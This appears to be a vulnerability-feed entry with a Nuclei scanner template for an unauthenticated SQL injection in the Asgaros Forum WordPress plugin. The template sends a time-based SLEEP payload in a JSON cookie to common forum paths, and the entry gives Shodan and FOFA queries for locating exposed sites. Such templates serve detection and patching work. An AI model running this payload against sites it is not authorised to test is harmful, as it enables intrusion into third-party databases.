CVE-2025-11452: Asgaros Forum < 3.2.0 - SQL Injection

2026-09-28 Unknown PoC Public

Description

Asgaros Forum for WordPress versions prior to 3.2.0 is vulnerable to unauthenticated SQL injection through the asgarosforum_unread_exclude cookie. The cookie is JSON-decoded and its object keys are imploded into a NOT IN() clause without sanitisation. The vulnerable query only runs while rendering the forum page, so the payload must be sent there rather than to the site root.

PoC

id: CVE-2025-11452

info:
  name: Asgaros Forum < 3.2.0 - SQL Injection
  author: Pauullamm
  severity: high
  description: |
    Asgaros Forum for WordPress versions prior to 3.2.0 is vulnerable to unauthenticated SQL injection through the asgarosforum_unread_exclude cookie. The cookie is JSON-decoded and its object keys are imploded into a NOT IN() clause without sanitisation. The vulnerable query only runs while rendering the forum page, so the payload must be sent there rather than to the site root.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL against the WordPress database.
  remediation: |
    Update Asgaros Forum to 3.2.0 or later.
  reference:
    - https://wpscan.com/vulnerability/e89f1f31-dc70-4ea5-b389-81c8be5b10c6/
    - https://plugins.trac.wordpress.org/browser/asgaros-forum/trunk/includes/forum-unread.php
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11452
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-11452
    epss-score: 0.01217
    epss-percentile: 0.67392
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 5
    vendor: asgaros
    product: asgaros-forum
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/asgaros-forum"
    fofa-query: body="/wp-content/plugins/asgaros-forum"
  tags: cve,cve2025,wordpress,wp-plugin,asgaros-forum,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/forum/"
      - "{{BaseURL}}/forums/"
      - "{{BaseURL}}/community/"
      - "{{BaseURL}}/board/"
      - "{{BaseURL}}/"

    headers:
      Cookie: 'asgarosforum_unread_exclude={"(SELECT(0)FROM(SELECT(SLEEP(7)))a)":1}'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '<body\b[^>]*\bclass=["''][^"'']*\basgaros-forum\b[^"'']*["'']'

      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ecff775eb87cfcc1f5541d9b6d8d5281befd2ebff32421092d6cfd2fbf958c26022100f993b73b0c3f8c04bf54a703798e77c83b6758648ae5af683338c5a023e25d80:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.